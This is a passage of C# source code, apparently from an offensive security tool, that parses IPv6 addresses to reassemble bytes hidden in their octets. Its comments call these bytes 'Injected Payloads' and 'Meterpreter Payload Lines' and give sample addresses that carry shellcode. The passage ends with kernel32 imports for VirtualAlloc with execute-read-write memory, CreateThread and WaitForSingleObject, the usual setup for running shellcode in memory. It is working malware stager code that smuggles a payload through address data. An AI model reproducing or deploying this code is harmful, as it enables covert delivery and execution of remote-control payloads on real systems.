count; j++) 296 | { 297 | temp_normalize0[ix] = "0" + temp_normalize0[ix]; 298 | } 299 | } 300 | if (ix == temp_normalize0.Length - 1) { Console.ForegroundColor = ConsoleColor.DarkCyan; } 301 | if (ix < temp_normalize0.Length - 6 && ix >= temp_normalize0.Length - 8) { Console.ForegroundColor = ConsoleColor.DarkCyan; } 302 | if (ix == temp_normalize0.Length - 2 || ix == temp_normalize0.Length - 3 || ix == temp_normalize0.Length - 4 || ix == temp_normalize0.Length - 5 || ix == temp_normalize0.Length - 6) 303 | { 304 | //// dump Injected Payloads from IPv6 Address to List ;) 305 | //// Note this code supported only 99 * 10 = 990 bytes payload 306 | //// you can change here to getting more than 990 bytes 307 | 308 | if (temp_normalize0[7].StartsWith("ae")) 309 | { 310 | object[] __X = {Convert.ToInt32(temp_normalize0[7].Remove(0,2)), temp_normalize0[ix]}; 311 | _IPV6_IPAddress_Payloads.Rows.Add(__X); 312 | 313 | } else if(temp_normalize0[7].StartsWith("0ae")) 314 | { 315 | object[] __X = {Convert.ToInt32(temp_normalize0[7].Remove(0,3)), temp_normalize0[ix]}; 316 | _IPV6_IPAddress_Payloads.Rows.Add(__X); 317 | } 318 | 319 | //// you can change here to getting more than 990 bytes 320 | 321 | //else if (temp_normalize0[7].StartsWith("a")) 322 | //{ 323 | // object[] __X = { Convert.ToInt32(temp_normalize0[7].Remove(0, 1)), temp_normalize0[ix] }; 324 | // _IPV6_IPAddress_Payloads.Rows.Add(__X); 325 | //} 326 | } 327 | 328 | Console.Write(temp_normalize0[ix] + " "); 329 | 330 | // checking Bytes and Sorting 331 | last_octet_tmp = ""; 332 | if (ix == temp_normalize0.Length - 1) 333 | { 334 | // this is last octet of IPv6 address 335 | last_octet_tmp += temp_normalize0[ix]; 336 | 337 | } 338 | } 339 | // Debug only {show address line 0} 340 | Console.Write(" ==> " + result_Line0); 341 | Console.WriteLine(); 342 | //last_octet_tmp = String.Format("{0:x2}{1:x2}{2:x2}"); 343 | try 344 | { 345 | if (last_octet_tmp.StartsWith("ae")) 346 | { 347 | 348 | PayloadLines_current_id = Convert.ToInt32(last_octet_tmp.ToString().Remove(0, 2)); 349 | 350 | Final_payload_count++; 351 | } 352 | else if (last_octet_tmp.StartsWith("0ae")) 353 | { 354 | 355 | PayloadLines_current_id = Convert.ToInt32(last_octet_tmp.ToString().Remove(0, 3)); 356 | 357 | Final_payload_count++; 358 | } 359 | } 360 | catch (Exception e0) 361 | { 362 | 363 | Console.WriteLine("e0 : " + e0.Message); 364 | } 365 | /// Getting First Line of Meterpreter Payload Lines ;) 366 | /// Getting First Line of Meterpreter Payload Lines ;) 367 | 368 | } 369 | catch (Exception e00) 370 | { 371 | Console.WriteLine("e00 : " + e00.Message); 372 | 373 | } 374 | 375 | 376 | 377 | 378 | /// Getting Line by Line Payloads ;) 379 | /// line17 ==> fe80:1111:1c49:1d0:418b:488:4801:ae17 380 | /// line18 ==> fe80:1111:d041:5841:585e:595a:4158:ae18 381 | /// fe80:1111:4a4a:4d31:c948:31c0:ac3c:ae4 ====> {fe80:1111:}{4a4a:4d31:c948:31c0:ac3c}{:ae4} 382 | /// Static Address octet = {fe80:1111:} , Payload [10 bytes] = {4a4a:4d31:c948:31c0:ac3c} , Counter Lines = {:ae4} 383 | /// Getting Line by Line Payloads ;) 384 | try 385 | { 386 | string result_Line_X = ""; 387 | int end = 0; 388 | for (int xx = breakpoint_1+1 ; xx < All_lines.Length; xx++ ) 389 | { 390 | if (xx < All_lines.Length) 391 | { 392 | end = All_lines[xx].LastIndexOf("\r\n"); 393 | } 394 | else if (xx == All_lines.Length - 1) 395 | { 396 | end = All_lines[xx].LastIndexOf("\r\n\r\n"); 397 | } 398 | result_Line_X = All_lines[xx].Substring(2, end - 2); 399 | Console.WriteLine(); 400 | Console.ForegroundColor = ConsoleColor.DarkGreen; 401 | 402 | // Debug only {show address} 403 | //Console.WriteLine(result_Line_X); 404 | 405 | 406 | 407 | 408 | /// normalize Address 0:0:0 ==> 0000:0000:0000 409 | /// normalize Address 0:0:0 ==> 0000:0000:0000 410 | string[] temp_normalize = result_Line_X.Split(':'); 411 | 412 | /// finding hidden zero in adress octets ;) 413 | for (int ix = 0; ix < temp_normalize.Length; ix++) 414 | { 415 | int count = temp_normalize[ix].Length; 416 | Console.ForegroundColor = ConsoleColor.DarkGreen; 417 | if (count < 4) 418 | { 419 | Console.ForegroundColor = ConsoleColor.Green; 420 | for (int j = 0; j < 4 - count; j++) 421 | { 422 | temp_normalize[ix] = "0" + temp_normalize[ix]; 423 | } 424 | } 425 | if (ix == temp_normalize.Length - 1) { Console.ForegroundColor = ConsoleColor.DarkCyan; } 426 | if (ix < temp_normalize.Length - 6 && ix >= temp_normalize.Length - 8) { Console.ForegroundColor = ConsoleColor.DarkCyan; } 427 | if (ix == temp_normalize.Length - 2 || ix == temp_normalize.Length - 3 || ix == temp_normalize.Length - 4 || ix == temp_normalize.Length - 5 || ix == temp_normalize.Length - 6) 428 | { 429 | //// dump Injected Payloads from IPv6 Address to List ;) 430 | //// Note this code supported only 99 * 10 = 990 bytes payload 431 | //// you can change here to getting more than 990 bytes 432 | 433 | if (temp_normalize[7].StartsWith("ae")) 434 | { 435 | object[] __X = { Convert.ToInt32(temp_normalize[7].Remove(0, 2)), temp_normalize[ix] }; 436 | _IPV6_IPAddress_Payloads.Rows.Add(__X); 437 | 438 | } 439 | else if (temp_normalize[7].StartsWith("0ae")) 440 | { 441 | object[] __X = { Convert.ToInt32(temp_normalize[7].Remove(0, 3)), temp_normalize[ix] }; 442 | _IPV6_IPAddress_Payloads.Rows.Add(__X); 443 | } 444 | //// you can change here to getting more than 990 bytes 445 | 446 | //else if (temp_normalize[7].StartsWith("a")) 447 | //{ 448 | // object[] __X = { Convert.ToInt32(temp_normalize[7].Remove(0, 1)), temp_normalize[ix] }; 449 | // _IPV6_IPAddress_Payloads.Rows.Add(__X); 450 | //} 451 | 452 | } 453 | Console.Write(temp_normalize[ix] + " "); 454 | 455 | 456 | // checking Bytes and Sorting 457 | last_octet_tmp = ""; 458 | if (ix == temp_normalize.Length - 1) 459 | { 460 | // this is last octet of IPv6 address 461 | last_octet_tmp += temp_normalize[ix]; 462 | 463 | } 464 | } 465 | // Debug only {show address} 466 | Console.WriteLine(" ==> " + result_Line_X); 467 | //Console.WriteLine(); 468 | try 469 | { 470 | //last_octet_tmp = String.Format("{0:x2}{1:x2}{2:x2}"); 471 | if (last_octet_tmp.StartsWith("ae")) 472 | { 473 | 474 | PayloadLines_current_id = Convert.ToInt32(last_octet_tmp.ToString().Remove(0, 2)); 475 | 476 | Final_payload_count++; 477 | } 478 | else if (last_octet_tmp.StartsWith("0ae")) 479 | { 480 | 481 | PayloadLines_current_id = Convert.ToInt32(last_octet_tmp.ToString().Remove(0, 3)); 482 | 483 | Final_payload_count++; 484 | } 485 | } 486 | catch (Exception e1) 487 | { 488 | Console.WriteLine("e1 : " + e1.Message); 489 | 490 | } 491 | /// normalize Address 0:0:0 ==> 0000:0000:0000 492 | /// normalize Address 0:0:0 ==> 0000:0000:0000 493 | } 494 | Console.WriteLine("PAYLOAD Lines Count: "+Final_payload_count.ToString()); 495 | } 496 | catch (Exception e4) 497 | { 498 | 499 | Console.WriteLine("e4 : " + e4.Message); 500 | } 501 | 502 | } 503 | catch (Exception e) 504 | { 505 | 506 | Console.WriteLine(e.Message); 507 | 508 | 509 | } 510 | 511 | } 512 | 513 | 514 | 515 | public static UInt32 MEM_COMMIT = 0x1000; 516 | public static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 517 | 518 | [DllImport("kernel32")] 519 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 520 | [DllImport("kernel32")] 521 | private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 522 | [DllImport("kernel32")] 523 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 524 | 525 | } 526 | } 527 | --------------------------------------------------------------------------------